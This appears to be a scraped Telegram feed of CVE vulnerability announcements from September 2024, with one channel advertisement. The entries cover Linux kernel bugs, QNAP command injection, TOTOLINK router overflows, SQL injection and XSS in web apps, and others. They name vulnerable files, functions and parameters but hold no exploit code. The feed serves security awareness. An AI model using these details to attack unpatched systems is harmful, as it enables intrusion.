🚨 CVE-2024-38632In the Linux kernel, the following vulnerability has been resolved:vfio/pci: fix potential memory leak in vfio_intx_enable()If vfio_irq_ctx_alloc() failed will lead to 'name' memory leak.🎖@cveNotify |
|
| 2024-09-09 14:07:39 |
🚨 CVE-2024-38630In the Linux kernel, the following vulnerability has been resolved:watchdog: cpu5wdt.c: Fix use-after-free bug caused by cpu5wdt_triggerWhen the cpu5wdt module is removing, the origin code uses del_timer() tode-activate the timer. If the timer handler is running, del_timer() couldnot stop it and will return directly. If the port region is released byrelease_region() and then the timer handler cpu5wdt_trigger() calls outb()to write into the region that is released, the use-after-free bug willhappen.Change del_timer() to timer_shutdown_sync() in order that the timer handlercould be finished before the port region is released.🎖@cveNotify |
|
| 2024-09-09 14:07:38 |
🚨 CVE-2024-38390In the Linux kernel, the following vulnerability has been resolved:drm/msm/a6xx: Avoid a nullptr dereference when speedbin setting failsCalling a6xx_destroy() before adreno_gpu_init() leads to a null pointerdereference on:msm_gpu_cleanup() : platform_set_drvdata(gpu->pdev, NULL);as gpu->pdev is only assigned in:a6xx_gpu_init()|_ adreno_gpu_init |_ msm_gpu_init()Instead of relying on handwavy null checks down the cleanup chain,explicitly de-allocate the LLC data and free a6xx_gpu instead.Patchwork: https://patchwork.freedesktop.org/patch/588919/🎖@cveNotify |
|
| 2024-09-09 14:07:37 |
🚨 CVE-2024-38381In the Linux kernel, the following vulnerability has been resolved:nfc: nci: Fix uninit-value in nci_rx_worksyzbot reported the following uninit-value access issue [1]nci_rx_work() parses received packet from ndev->rx_q. It should bevalidated header size, payload size and total packet size beforeprocessing the packet. If an invalid packet is detected, it should besilently discarded.🎖@cveNotify |
|
| 2024-09-09 14:07:34 |
🚨 CVE-2023-33202Bouncy Castle for Java before 1.73 contains a potential Denial of Service (DoS) issue within the Bouncy Castle org.bouncycastle.openssl.PEMParser class. This class parses OpenSSL PEM encoded streams containing X.509 certificates, PKCS8 encoded keys, and PKCS7 objects. Parsing a file that has crafted ASN.1 data through the PEMParser causes an OutOfMemoryError, which can enable a denial of service attack. (For users of the FIPS Java API: BC-FJA 1.0.2.3 and earlier are affected; BC-FJA 1.0.2.4 is fixed.)🎖@cveNotify |
|
| 2024-09-09 14:07:33 |
🚨 CVE-2016-9243HKDF in cryptography before 1.5.2 returns an empty byte-string if used with a length less than algorithm.digest_size.🎖@cveNotify |
|
| 2024-09-09 14:07:32 |
🚨 CVE-2016-9388The ras_getcmap function in ras_dec.c in JasPer before 1.900.14 allows remote attackers to cause a denial of service (assertion failure) via a crafted image file.🎖@cveNotify |
|
| 2024-09-09 13:37:27 |
🚨 CVE-2024-36270In the Linux kernel, the following vulnerability has been resolved:netfilter: tproxy: bail out if IP has been disabled on the devicesyzbot reports:general protection fault, probably for non-canonical address 0xdffffc0000000003: 0000 [#1] PREEMPT SMP KASAN PTIKASAN: null-ptr-deref in range [0x0000000000000018-0x000000000000001f][..]RIP: 0010:nf_tproxy_laddr4+0xb7/0x340 net/ipv4/netfilter/nf_tproxy_ipv4.c:62Call Trace: nft_tproxy_eval_v4 net/netfilter/nft_tproxy.c:56 [inline] nft_tproxy_eval+0xa9a/0x1a00 net/netfilter/nft_tproxy.c:168__in_dev_get_rcu() can return NULL, so check for this.🎖@cveNotify |
|
| 2024-09-09 13:37:26 |
🚨 CVE-2024-37351There is a cross-site scripting vulnerability in themanagement UI of Absolute Secure Access prior to version 13.06. Attackers withsystem administrator permissions can interfere with other systemadministrator’s use of the management UI when the second administrator lateredits the same management object. This vulnerability is distinct from CVE-2024-37348 andCVE-2024-37349. The scope is unchanged, there is no loss of confidentiality. Impactto system integrity is high, impact to system availability is none.🎖@cveNotify |
|
| 2024-09-09 13:37:25 |
🚨 CVE-2024-37349There is a cross-site scripting vulnerability in themanagement UI of Absolute Secure Access prior to version 13.06. Attackers withsystem administrator permissions can interfere with other systemadministrator’s use of the management UI when the victim administrator editsthe same management object. This vulnerability is distinct from CVE-2024-37348 andCVE-2024-37351. The scope is unchanged, there is no loss of confidentiality. Impactto system integrity is high, impact to system availability is none.🎖@cveNotify |
|
| 2024-09-09 13:07:42 |
🚨 CVE-2024-27125A cross-site scripting (XSS) vulnerability has been reported to affect Helpdesk. If exploited, the vulnerability could allow authenticated administrators to inject malicious code via a network.We have already fixed the vulnerability in the following version:Helpdesk 3.3.1 and later🎖@cveNotify |
|
| 2024-09-09 13:07:41 |
🚨 CVE-2024-21904A path traversal vulnerability has been reported to affect several QNAP operating system versions. If exploited, the vulnerability could allow users to read the contents of unexpected files and expose sensitive data via a network.We have already fixed the vulnerability in the following versions:QTS 5.1.7.2770 build 20240520 and laterQuTS hero h5.1.7.2770 build 20240520 and later🎖@cveNotify |
|
| 2024-09-09 13:07:40 |
🚨 CVE-2024-21903An OS command injection vulnerability has been reported to affect several QNAP operating system versions. If exploited, the vulnerability could allow authenticated administrators to execute commands via a network.We have already fixed the vulnerability in the following versions:QTS 5.1.6.2722 build 20240402 and laterQuTS hero h5.1.6.2734 build 20240414 and later🎖@cveNotify |
|
| 2024-09-09 13:07:37 |
🚨 CVE-2024-21898An OS command injection vulnerability has been reported to affect several QNAP operating system versions. If exploited, the vulnerability could allow authenticated users to execute commands via a network.We have already fixed the vulnerability in the following versions:QTS 5.1.6.2722 build 20240402 and laterQuTS hero h5.1.6.2734 build 20240414 and later🎖@cveNotify |
|
| 2024-09-09 13:07:36 |
🚨 CVE-2023-51368A NULL pointer dereference vulnerability has been reported to affect several QNAP operating system versions. If exploited, the vulnerability could allow users to launch a denial-of-service (DoS) attack via a network.We have already fixed the vulnerability in the following versions:QTS 5.1.6.2722 build 20240402 and laterQuTS hero h5.1.6.2734 build 20240414 and later🎖@cveNotify |
|
| 2024-09-09 13:07:35 |
🚨 CVE-2023-51366A path traversal vulnerability has been reported to affect several QNAP operating system versions. If exploited, the vulnerability could allow users to read the contents of unexpected files and expose sensitive data via a network.We have already fixed the vulnerability in the following versions:QTS 5.1.6.2722 build 20240402 and laterQuTS hero h5.1.6.2734 build 20240414 and later🎖@cveNotify |
|
| 2024-09-09 13:07:31 |
🚨 CVE-2023-47563An OS command injection vulnerability has been reported to affect Video Station. If exploited, the vulnerability could allow authenticated users to execute commands via a network.We have already fixed the vulnerability in the following version:Video Station 5.8.2 and later🎖@cveNotify |
|
| 2024-09-09 13:07:30 |
🚨 CVE-2023-39300An OS command injection vulnerability has been reported to affect legacy QTS. If exploited, the vulnerability could allow authenticated administrators to execute commands via a network.We have already fixed the vulnerability in the following versions:QTS 4.3.6.2805 build 20240619 and laterQTS 4.3.4.2814 build 20240618 and laterQTS 4.3.3.2784 build 20240619 and laterQTS 4.2.6 build 20240618 and later🎖@cveNotify |
|
| 2024-09-09 13:07:26 |
🚨 CVE-2023-34974An OS command injection vulnerability has been reported to affect several QNAP operating system versions. If exploited, the vulnerability could allow users to execute commands via a network.QuTScloud, QVR, QES are not affected.We have already fixed the vulnerability in the following versions:QTS 4.5.4.2790 build 20240605 and laterQuTS hero h4.5.4.2626 build 20231225 and later🎖@cveNotify |
|
| 2024-09-09 13:07:25 |
🚨 CVE-2022-48768In the Linux kernel, the following vulnerability has been resolved:tracing/histogram: Fix a potential memory leak for kstrdup()kfree() is missing on an error path to free the memory allocated bykstrdup(): p = param = kstrdup(data->params[i], GFP_KERNEL);So it is better to free it via kfree(p).🎖@cveNotify |
|
| 2024-09-09 10:37:34 |
🚨 CVE-2024-6572Improper host key checking in active check 'Check SFTP Service' and special agent 'VNX quotas and filesystem' in Checkmk before Checkmk 2.3.0p15, 2.2.0p33, 2.1.0p48 and 2.0.0 (EOL) allows man-in-the-middle attackers to intercept traffic🎖@cveNotify |
|
| 2024-09-09 09:37:38 |
🚨 CVE-2024-6445Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal') vulnerability in DataFlowX Technology DataDiodeX allows Path Traversal.This issue affects DataDiodeX: from v3.0.0 before v3.1.7.🎖@cveNotify |
|
| 2024-09-09 08:38:07 |
🚨 CVE-2023-39417IN THE EXTENSION SCRIPT, a SQL Injection vulnerability was found in PostgreSQL if it uses @extowner@, @extschema@, or @extschema:...@ inside a quoting construct (dollar quoting, '', or ""). If an administrator has installed files of a vulnerable, trusted, non-bundled extension, an attacker with database-level CREATE privilege can execute arbitrary code as the bootstrap superuser.🎖@cveNotify |
|
| 2024-09-09 06:32:30 |
Enjoy our content? Advertise on this channel and reach a highly engaged audience! 👉🏻 It's easy with Telega.io. As the leading platform for native ads and integrations on Telegram, it provides user-friendly and efficient tools for quick and automated ad launches. ⚡️ Place your ad here in three simple steps: 1 Sign up 2 Top up the balance in a convenient way 3 Create your advertising post If your ad aligns with our content, we’ll gladly publish it. Start your promotion journey now! |
Images
|
| 2024-09-09 05:37:24 |
🚨 CVE-2024-45625Cross-site scripting vulnerability exists in Forminator versions prior to 1.34.1. If this vulnerability is exploited, an arbitrary script may be executed on the web browser of the user who follows a crafted URL and accesses the webpage with the web form created by Forminator.🎖@cveNotify |
|
| 2024-09-09 03:37:25 |
🚨 CVE-2024-8585Orca HCM from LEARNING DIGITA does not properly restrict a specific parameter of the file download functionality, allowing a remote attacker with regular privileges to download arbitrary system files.🎖@cveNotify |
|
| 2024-09-09 03:37:24 |
🚨 CVE-2024-8584Orca HCM from LEARNING DIGITAL does not properly restrict access to a specific functionality, allowing unauthenticated remote attacker to exploit this functionality to create an account with administrator privilege and subsequently use it to log in.🎖@cveNotify |
|
| 2024-09-08 22:37:25 |
🚨 CVE-2024-8583A vulnerability was found in SourceCodester Online Bank Management System and Online Bank Management System - 1.0. It has been classified as problematic. This affects an unknown part of the file /mfeedback.php of the component Feedback Handler. The manipulation leads to cross site scripting. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used.🎖@cveNotify |
|
| 2024-09-08 22:37:24 |
🚨 CVE-2024-8582A vulnerability was found in SourceCodester Food Ordering Management System 1.0 and classified as problematic. Affected by this issue is some unknown functionality of the file /index.php. The manipulation of the argument description leads to cross site scripting. The attack may be launched remotely. The exploit has been disclosed to the public and may be used.🎖@cveNotify |
|
| 2024-09-08 21:37:24 |
🚨 CVE-2024-8580A vulnerability classified as critical was found in TOTOLINK AC1200 T8 4.1.5cu.861_B20230220. This vulnerability affects unknown code of the file /etc/shadow.sample. The manipulation leads to use of hard-coded password. The attack can be initiated remotely. The complexity of an attack is rather high. The exploitation appears to be difficult. The exploit has been disclosed to the public and may be used. The vendor was contacted early about this disclosure but did not respond in any way.🎖@cveNotify |
|
| 2024-09-08 20:37:24 |
🚨 CVE-2024-8579A vulnerability classified as critical has been found in TOTOLINK AC1200 T8 4.1.5cu.861_B20230220. This affects the function setWiFiRepeaterCfg of the file /cgi-bin/cstecgi.cgi. The manipulation of the argument password leads to buffer overflow. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. The vendor was contacted early about this disclosure but did not respond in any way.🎖@cveNotify |
|
| 2024-09-08 19:37:25 |
🚨 CVE-2024-8578A vulnerability was found in TOTOLINK AC1200 T8 4.1.5cu.861_B20230220. It has been rated as critical. Affected by this issue is the function setWiFiMeshName of the file /cgi-bin/cstecgi.cgi. The manipulation of the argument device_name leads to buffer overflow. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. The vendor was contacted early about this disclosure but did not respond in any way.🎖@cveNotify |
|
| 2024-09-08 19:37:24 |
🚨 CVE-2024-8577A vulnerability was found in TOTOLINK AC1200 T8 and AC1200 T10 4.1.5cu.861_B20230220/4.1.8cu.5207. It has been declared as critical. Affected by this vulnerability is the function setStaticDhcpRules of the file /cgi-bin/cstecgi.cgi. The manipulation of the argument desc leads to buffer overflow. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. The vendor was contacted early about this disclosure but did not respond in any way.🎖@cveNotify |
|
| 2024-09-08 18:37:24 |
🚨 CVE-2024-8576A vulnerability was found in TOTOLINK AC1200 T8 and AC1200 T10 4.1.5cu.861_B20230220/4.1.8cu.5207. It has been classified as critical. Affected is the function setIpPortFilterRules of the file /cgi-bin/cstecgi.cgi. The manipulation of the argument desc leads to buffer overflow. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. The vendor was contacted early about this disclosure but did not respond in any way.🎖@cveNotify |
|
| 2024-09-08 17:37:24 |
🚨 CVE-2024-8575A vulnerability was found in TOTOLINK AC1200 T8 4.1.5cu.861_B20230220 and classified as critical. This issue affects the function setWiFiScheduleCfg of the file /cgi-bin/cstecgi.cgi. The manipulation of the argument desc leads to buffer overflow. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. The vendor was contacted early about this disclosure but did not respond in any way.🎖@cveNotify |
|
| 2024-09-08 11:37:24 |
🚨 CVE-2024-8574A vulnerability has been found in TOTOLINK AC1200 T8 4.1.5cu.861_B20230220 and classified as critical. This vulnerability affects the function setParentalRules of the file /cgi-bin/cstecgi.cgi. The manipulation of the argument slaveIpList leads to os command injection. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. The vendor was contacted early about this disclosure but did not respond in any way.🎖@cveNotify |
|
| 2024-09-08 10:37:24 |
🚨 CVE-2024-8573A vulnerability, which was classified as critical, was found in TOTOLINK AC1200 T8 and AC1200 T10 4.1.5cu.861_B20230220/4.1.8cu.5207. This affects the function setParentalRules of the file /cgi-bin/cstecgi.cgi. The manipulation of the argument desc leads to buffer overflow. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. The vendor was contacted early about this disclosure but did not respond in any way.🎖@cveNotify |
|
| 2024-09-08 08:37:32 |
🚨 CVE-2024-8572A vulnerability was found in Gouniverse GoLang CMS 1.4.0. It has been declared as problematic. This vulnerability affects the function PageRenderHtmlByAlias of the file FrontendHandler.go. The manipulation of the argument alias leads to cross site scripting. The attack can be initiated remotely. Upgrading to version 1.4.1 is able to address this issue. The patch is identified as 3e661cdfb4beeb9fe2ad507cdb8104c0b17d072c. It is recommended to upgrade the affected component.🎖@cveNotify |
|
| 2024-09-08 08:37:26 |
🚨 CVE-2024-8571A vulnerability was found in erjemin roll_cms up to 1484fe2c4e0805946a7bcf46218509fcb34883a9. It has been classified as problematic. This affects an unknown part of the file roll_cms/roll_cms/views.py. The manipulation leads to information exposure through error message. This product takes the approach of rolling releases to provide continious delivery. Therefore, version details for affected and updated releases are not available.🎖@cveNotify |
|
| 2024-09-08 08:37:25 |
🚨 CVE-2024-43835In the Linux kernel, the following vulnerability has been resolved:virtio_net: Fix napi_skb_cache_put warningAfter the commit bdacf3e34945 ("net: Use nested-BH locking fornapi_alloc_cache.") was merged, the following warning began to appear: WARNING: CPU: 5 PID: 1 at net/core/skbuff.c:1451 napi_skb_cache_put+0x82/0x4b0 __warn+0x12f/0x340 napi_skb_cache_put+0x82/0x4b0 napi_skb_cache_put+0x82/0x4b0 report_bug+0x165/0x370 handle_bug+0x3d/0x80 exc_invalid_op+0x1a/0x50 asm_exc_invalid_op+0x1a/0x20 __free_old_xmit+0x1c8/0x510 napi_skb_cache_put+0x82/0x4b0 __free_old_xmit+0x1c8/0x510 __free_old_xmit+0x1c8/0x510 __pfx___free_old_xmit+0x10/0x10The issue arises because virtio is assuming it's running in NAPI contexteven when it's not, such as in the netpoll case.To resolve this, modify virtnet_poll_tx() to only set NAPI when budgetis available. Same for virtnet_poll_cleantx(), which always assumed thatit was in a NAPI context.🎖@cveNotify |
|
| 2024-09-08 08:37:24 |
🚨 CVE-2024-41096In the Linux kernel, the following vulnerability has been resolved:PCI/MSI: Fix UAF in msi_capability_initKFENCE reports the following UAF: BUG: KFENCE: use-after-free read in __pci_enable_msi_range+0x2c0/0x488 Use-after-free read at 0x0000000024629571 (in kfence-#12): __pci_enable_msi_range+0x2c0/0x488 pci_alloc_irq_vectors_affinity+0xec/0x14c pci_alloc_irq_vectors+0x18/0x28 kfence-#12: 0x0000000008614900-0x00000000e06c228d, size=104, cache=kmalloc-128 allocated by task 81 on cpu 7 at 10.808142s: __kmem_cache_alloc_node+0x1f0/0x2bc kmalloc_trace+0x44/0x138 msi_alloc_desc+0x3c/0x9c msi_domain_insert_msi_desc+0x30/0x78 msi_setup_msi_desc+0x13c/0x184 __pci_enable_msi_range+0x258/0x488 pci_alloc_irq_vectors_affinity+0xec/0x14c pci_alloc_irq_vectors+0x18/0x28 freed by task 81 on cpu 7 at 10.811436s: msi_domain_free_descs+0xd4/0x10c msi_domain_free_locked.part.0+0xc0/0x1d8 msi_domain_alloc_irqs_all_locked+0xb4/0xbc pci_msi_setup_msi_irqs+0x30/0x4c __pci_enable_msi_range+0x2a8/0x488 pci_alloc_irq_vectors_affinity+0xec/0x14c pci_alloc_irq_vectors+0x18/0x28Descriptor allocation done in:__pci_enable_msi_range msi_capability_init msi_setup_msi_desc msi_insert_msi_desc msi_domain_insert_msi_desc msi_alloc_desc ...Freed in case of failure in __msi_domain_alloc_locked()__pci_enable_msi_range msi_capability_init pci_msi_setup_msi_irqs msi_domain_alloc_irqs_all_locked msi_domain_alloc_locked __msi_domain_alloc_locked => fails msi_domain_free_locked ...That failure propagates back to pci_msi_setup_msi_irqs() inmsi_capability_init() which accesses the descriptor for unmasking in theerror exit path.Cure it by copying the descriptor and using the copy for the error exit pathunmask operation.[ tglx: Massaged change log ]🎖@cveNotify |
|
| 2024-09-08 07:37:24 |
🚨 CVE-2024-8570A vulnerability was found in itsourcecode Tailoring Management System 1.0 and classified as critical. Affected by this issue is some unknown functionality of the file /inccatadd.php. The manipulation of the argument title leads to sql injection. The attack may be launched remotely. The exploit has been disclosed to the public and may be used.🎖@cveNotify |
|
| 2024-09-08 06:37:32 |
🚨 CVE-2024-6924The TrueBooker WordPress plugin before 1.0.3 does not properly sanitise and escape a parameter before using it in a SQL statement via an AJAX action available to unauthenticated users, leading to a SQL injection.🎖@cveNotify |
|
| 2024-09-08 06:37:26 |
🚨 CVE-2024-6859The WP MultiTasking WordPress plugin through 0.1.12 does not validate and escape some of its shortcode attributes before outputting them back in a page/post where the shortcode is embed, which could allow users with the contributor role and above to perform Stored Cross-Site Scripting attacks🎖@cveNotify |
|
| 2024-09-08 06:37:25 |
🚨 CVE-2024-6853The WP MultiTasking WordPress plugin through 0.1.12 does not have CSRF check when updating welcome popups, which could allow attackers to make logged admins perform such action via a CSRF attack🎖@cveNotify |
|
| 2024-09-08 06:37:24 |
🚨 CVE-2024-6852The WP MultiTasking WordPress plugin through 0.1.12 does not have CSRF check in place when updating its settings, which could allow attackers to make a logged in admin change them via a CSRF attack🎖@cveNotify |
|
| 2024-09-08 05:37:24 |
🚨 CVE-2024-8569A vulnerability has been found in code-projects Hospital Management System 1.0 and classified as critical. Affected by this vulnerability is an unknown functionality of the file user-login.php. The manipulation of the argument username leads to sql injection. The attack can be launched remotely. The exploit has been disclosed to the public and may be used.🎖@cveNotify |
|
| 2024-09-08 03:37:24 |
🚨 CVE-2024-8568A vulnerability, which was classified as critical, was found in Mini-Tmall up to 20240901. Affected is the function rewardMapper.select of the file tmall/admin/order/1/1. The manipulation of the argument orderBy leads to sql injection. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. The vendor was contacted early about this disclosure but did not respond in any way.🎖@cveNotify |
|
| 2024-09-08 02:37:24 |
🚨 CVE-2024-8567A vulnerability, which was classified as critical, has been found in itsourcecode Payroll Management System 1.0. This issue affects some unknown processing of the file /ajax.php?action=delete_deductions. The manipulation of the argument id leads to sql injection. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used.🎖@cveNotify |
|
| 2024-09-08 00:37:24 |
🚨 CVE-2024-8566A vulnerability classified as problematic was found in code-projects Online Shop Store 1.0. This vulnerability affects unknown code of the file /settings.php. The manipulation of the argument error leads to cross site scripting. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used.🎖@cveNotify |
|
| 2024-09-07 23:37:24 |
🚨 CVE-2024-8565A vulnerability was found in SourceCodesters Clinics Patient Management System 2.0. It has been rated as critical. This issue affects some unknown processing of the file /print_diseases.php. The manipulation of the argument disease/from/to leads to sql injection. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used.🎖@cveNotify |
|
| 2024-09-07 21:37:24 |
🚨 CVE-2024-8564A vulnerability was found in SourceCodester PHP CRUD 1.0. It has been declared as critical. This vulnerability affects unknown code of the file /endpoint/update.php. The manipulation of the argument tbl_person_id/first_name/middle_name/last_name leads to sql injection. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used.🎖@cveNotify |
|
| 2024-09-07 20:37:24 |
🚨 CVE-2024-8563A vulnerability was found in SourceCodester PHP CRUD 1.0. It has been classified as problematic. This affects an unknown part of the file /endpoint/update.php. The manipulation of the argument first_name/middle_name/last_name leads to cross site scripting. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used.🎖@cveNotify |
|
| 2024-09-07 19:37:25 |
🚨 CVE-2024-8562A vulnerability was found in SourceCodester PHP CRUD 1.0 and classified as problematic. Affected by this issue is some unknown functionality of the file /endpoint/Add.php. The manipulation of the argument first_name/middle_name/last_name leads to cross site scripting. The attack may be launched remotely. The exploit has been disclosed to the public and may be used.🎖@cveNotify |
|
| 2024-09-07 19:37:24 |
🚨 CVE-2024-8561A vulnerability has been found in SourceCodester PHP CRUD 1.0 and classified as critical. Affected by this vulnerability is an unknown functionality of the file /endpoint/delete.php of the component Delete Person Handler. The manipulation of the argument person leads to sql injection. The attack can be launched remotely.🎖@cveNotify |
|
| 2024-09-07 18:37:25 |
🚨 CVE-2024-8560A vulnerability, which was classified as critical, was found in SourceCodester Simple Invoice Generator System 1.0. Affected is an unknown function of the file /save_invoice.php. The manipulation of the argument invoice_code/customer/cashier/total_amount/discount_percentage/discount_amount/tendered_amount leads to sql injection. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used.🎖@cveNotify |
|
| 2024-09-07 18:37:24 |
🚨 CVE-2024-8559A vulnerability, which was classified as critical, has been found in SourceCodester Online Food Menu 1.0. This issue affects some unknown processing of the file /endpoint/delete-menu.php. The manipulation of the argument menu leads to sql injection. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used.🎖@cveNotify |
|
| 2024-09-07 17:37:41 |
🚨 CVE-2024-42024A vulnerability that allows an attacker in possession of the Veeam ONE Agent service account credentials to perform remote code execution on the machine where the Veeam ONE Agent is installed.🎖@cveNotify |
|
| 2024-09-07 17:37:40 |
🚨 CVE-2024-42022An incorrect permission assignment vulnerability allows an attacker to modify product configuration files.🎖@cveNotify |
|
| 2024-09-07 17:37:36 |
🚨 CVE-2024-42019A vulnerability that allows an attacker to access the NTLM hash of the Veeam Reporter Service service account. This attack requires user interaction and data collected from Veeam Backup & Replication.🎖@cveNotify |
|
| 2024-09-07 17:37:35 |
🚨 CVE-2024-40714An improper certificate validation vulnerability in TLS certificate validation allows an attacker on the same network to intercept sensitive credentials during restore operations.🎖@cveNotify |
|
| 2024-09-07 17:37:31 |
🚨 CVE-2024-40712A path traversal vulnerability allows an attacker with a low-privileged account and local access to the system to perform local privilege escalation (LPE).🎖@cveNotify |
|
| 2024-09-07 17:37:30 |
🚨 CVE-2024-40709A missing authorization vulnerability allows a local low-privileged user on the machine to escalate their privileges to root level.🎖@cveNotify |
|
| 2024-09-07 17:37:26 |
🚨 CVE-2024-39715A code injection vulnerability that allows a low-privileged user with REST API access granted to remotely upload arbitrary files to the VSPC server using REST API, leading to remote code execution on VSPC server.🎖@cveNotify |
|
| 2024-09-07 17:37:25 |
🚨 CVE-2024-38651A code injection vulnerability can allow a low-privileged user to overwrite files on that VSPC server, which can lead to remote code execution on VSPC server.🎖@cveNotify |
|
| 2024-09-07 17:37:24 |
🚨 CVE-2024-38650An authentication bypass vulnerability can allow a low privileged attacker to access the NTLM hash of service account on the VSPC server.🎖@cveNotify |
|
| 2024-09-07 16:37:31 |
🚨 CVE-2024-36138Bypass incomplete fix of CVE-2024-27980, that arises from improper handling of batch files with all possible extensions on Windows via child_process.spawn / child_process.spawnSync. A malicious command line argument can inject arbitrary commands and achieve code execution even if the shell option is not enabled.🎖@cveNotify |
|
| 2024-09-07 16:37:30 |
🚨 CVE-2023-46809Node.js versions which bundle an unpatched version of OpenSSL or run against a dynamically linked version of OpenSSL which are unpatched are vulnerable to the Marvin Attack - https://people.redhat.com/~hkario/marvin/, if PCKS #1 v1.5 padding is allowed when performing RSA descryption using a private key.🎖@cveNotify |
|
| 2024-09-07 16:37:26 |
🚨 CVE-2023-30587A vulnerability in Node.js version 20 allows for bypassing restrictions set by the --experimental-permission flag using the built-in inspector module (node:inspector).By exploiting the Worker class's ability to create an "internal worker" with the kIsInternal Symbol, attackers can modify the isInternal value when an inspector is attached within the Worker constructor before initializing a new WorkerImpl. This vulnerability exclusively affects Node.js users employing the permission model mechanism.Please note that at the time this CVE was issued, the permission model is an experimental feature of Node.js.🎖@cveNotify |
|
| 2024-09-07 16:37:25 |
🚨 CVE-2023-30583fs.openAsBlob() can bypass the experimental permission model when using the file system read restriction with the `--allow-fs-read` flag in Node.js 20. This flaw arises from a missing check in the `fs.openAsBlob()` API.Please note that at the time this CVE was issued, the permission model is an experimental feature of Node.js.🎖@cveNotify |
|
| 2024-09-07 16:37:24 |
🚨 CVE-2023-30582A vulnerability has been identified in Node.js version 20, affecting users of the experimental permission model when the --allow-fs-read flag is used with a non-* argument. This flaw arises from an inadequate permission model that fails to restrict file watching through the fs.watchFile API. As a result, malicious actors can monitor files that they do not have explicit read access to.Please note that at the time this CVE was issued, the permission model is an experimental feature of Node.js.🎖@cveNotify |
|
| 2024-09-07 15:37:25 |
🚨 CVE-2024-40681IBM MQ Operator 2.0.26 and 3.2.4 could allow an authenticated user in a specifically defined role, to bypass security restrictions and execute actions against the queue manager.🎖@cveNotify |
|
| 2024-09-07 14:37:26 |
🚨 CVE-2024-8554A vulnerability was found in SourceCodester Clinics Patient Management System 2.0 and classified as problematic. This issue affects some unknown processing of the file /users.php. The manipulation of the argument message leads to cross site scripting. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used.🎖@cveNotify |
|
| 2024-09-07 14:37:25 |
🚨 CVE-2024-37068IBM Maximo Application Suite - Manage Component 8.10, 8.11, and 9.0 uses weaker than expected cryptographic algorithms that could allow an attacker to decrypt highly sensitive information.🎖@cveNotify |
|
| 2024-09-07 13:37:24 |
🚨 CVE-2022-33162IBM Security Directory Integrator 7.2.0 and Security Verify Directory Integrator 10.0.0 does not perform any authentication for functionality that requires a provable user identity or consumes a significant amount of resources, at the privilege level of a standard unprivileged user. IBM X-Force ID: 228570.🎖@cveNotify |
|
| 2024-09-07 13:07:25 |
🚨 CVE-2021-46309An SQL Injection vulnerability exists in Sourcecodester Employee and Visitor Gate Pass Logging System 1.0 via the username parameter.🎖@cveNotify |
|
| 2024-09-07 12:37:26 |
🚨 CVE-2024-7620The Customizer Export/Import plugin for WordPress is vulnerable to arbitrary file uploads due to missing file type validation in the '_import' function in all versions up to, and including, 0.9.7. This makes it possible for authenticated attackers, with Administrator-level access and above, to upload arbitrary files on the affected site's server which may make remote code execution possible. NOTE: This vulnerability is only exploitable when used in conjunction with a race condition as the uploaded file is deleted shortly after it is created.🎖@cveNotify |
|
| 2024-09-07 12:37:25 |
🚨 CVE-2024-6010The Cost Calculator Builder PRO plugin for WordPress is vulnerable to price manipulation in all versions up to, and including, 3.1.96. This is due to the plugin allowing the price field to be manipulated prior to processing via the 'create_cc_order' function, called from the Cost Calculator Builder plugin. This makes it possible for unauthenticated attackers to manipulate the price of orders submitted via the calculator. Note: this vulnerability was partially patched with the release of Cost Calculator Builder version 3.2.17.🎖@cveNotify |
|
| 2024-09-07 12:37:24 |
🚨 CVE-2024-1596The Ninja Forms - File Uploads plugin for WordPress is vulnerable to Stored Cross-Site Scripting via an uploaded file (e.g. RTX file) in all versions up to, and including, 3.3.16 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.🎖@cveNotify |
|
| 2024-09-07 09:37:25 |
🚨 CVE-2024-8523A vulnerability was found in lmxcms up to 1.4 and classified as critical. Affected by this issue is the function formatData of the file /admin.php?m=Acquisi&a=testcj&lid=1 of the component SQL Command Execution Module. The manipulation of the argument data leads to code injection. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. The vendor was contacted early about this disclosure but did not respond in any way.🎖@cveNotify |
|
| 2024-09-07 09:37:24 |
🚨 CVE-2024-6849The Preloader Plus – WordPress Loading Screen Plugin plugin for WordPress is vulnerable to Stored Cross-Site Scripting via SVG File uploads in all versions up to, and including, 2.2.1 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Author-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses the SVG file.🎖@cveNotify |
|
| 2024-09-07 08:37:25 |
🚨 CVE-2024-45498Example DAG: example_inlet_event_extra.py shipped with Apache Airflow version 2.10.0 has a vulnerability that allows an authenticated attacker with only DAG trigger permission to execute arbitrary commands. If you used that example as the base of your DAGs - please review if you have not copied the dangerous example; see https://github.com/apache/airflow/pull/41873 for more information. We recommend against exposing the example DAGs in your deployment. If you must expose the example DAGs, upgrade Airflow to version 2.10.1 or later.🎖@cveNotify |
|
| 2024-09-07 08:37:24 |
🚨 CVE-2024-45034Apache Airflow versions before 2.10.1 have a vulnerability that allows DAG authors to add local settings to the DAG folder and get it executed by the scheduler, where the scheduler is not supposed to execute code submitted by the DAG author. Users are advised to upgrade to version 2.10.1 or later, which has fixed the vulnerability.🎖@cveNotify |
|
| 2024-09-07 03:37:24 |
